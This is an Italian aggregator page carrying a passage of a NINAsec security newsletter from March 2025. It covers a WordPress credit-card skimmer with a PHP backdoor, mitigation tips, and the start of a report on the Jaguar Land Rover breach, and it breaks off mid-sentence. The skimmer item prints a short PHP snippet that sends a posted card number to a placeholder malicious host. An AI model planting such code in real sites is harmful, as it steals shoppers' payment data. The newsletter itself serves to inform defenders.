sabato 29 agosto 2026 Privacy RSS Admin
ITAGORA!
Agorà Italia - il portale · directory · notizie · ricerca
CANALI: SicurezzaLinuxAndroidGeekNewsletterAttualitàPodcastTutta la directory

Home > NINAsec > Voce

NINAsec sabato 29 marzo 2025, 07:51 · IT · Newsletter

Security Weekly 23-28/3/25

Buon sabato e ben ritrovato caro cyber User!In questa puntata:Skimmer carte di credito da vicinoFlashnews su violazione a JaguarMaven che esfiltra credenzialiFlashnews per phishing contro BookingSteganografia per distribuire MalwareIscriviti oraSkimmer di Carte di Credito e backdoor su siti e-commerce WordPressUn recente articolo ha evidenziato l'infezione di un sito e-commerce basato su WordPress con uno skimmer di carte di credito e una backdoor. Gli aggressori hanno iniettato codice JavaScript malevolo per catturare i dati delle carte di credito degli utenti durante il processo di pagamento.​Dettagli Tecnici:Iniezione di JavaScript Malevolo: Il codice malevolo è stato inserito nei file del tema o dei plugin del sito, eseguendo lo skimming dei dati delle carte di credito.​Backdoor PHP: È stata rilevata una backdoor PHP che consentiva agli aggressori di mantenere l'accesso al sito compromesso.​Esempio di Codice Malevolo:<?php if (isset($_POST['cc_number'])) { $cc_number = $_POST['cc_number']; // Invia i dati della carta di credito a un server remoto file_get_contents('https://malicious-website.com/steal?cc=' . $cc_number); } ?>Mitigazione:Mantenere aggiornati WordPress, i temi e i plugin.​Utilizzare plugin di sicurezza per monitorare modifiche ai file.​Implementare l'autenticazione a due fattori per gli accessi amministrativi.Violazione di Jaguar Land Rover da parte del gruppo ransomware HELLCAT e successivo attacco di un secondo hackerJaguar Land Rover (JLR) ha recentemente subito una significativa violazione dei dati attribuita al gruppo ransomware HELLCAT. Questo attacco ha portato all'esfiltrazione di gigabyte di informazioni sensibili, tra cui documenti proprietari, codici sorgente e dati di dipendenti e partner. La tecnica utilizzata dagli aggressori si basa sull'uso di infostealer per compromettere le credenziali di accesso a sistemi critici come Atlassian JIRA. (Fonte: ​Infostealers)Dettagli dell'attacco:Utilizzo di Infostealer: il gruppo HELLCAT ha sfrutta

Questa voce ha un allegato (spesso audio podcast) sul sito originale — Itagora non lo scarica sul browser del visitatore.

Leggi sul sito originale →

Itagora tiene in archivio titolo e sommario per la ricerca interna. Il testo completo resta sulla fonte. Il link in uscita non invia referrer.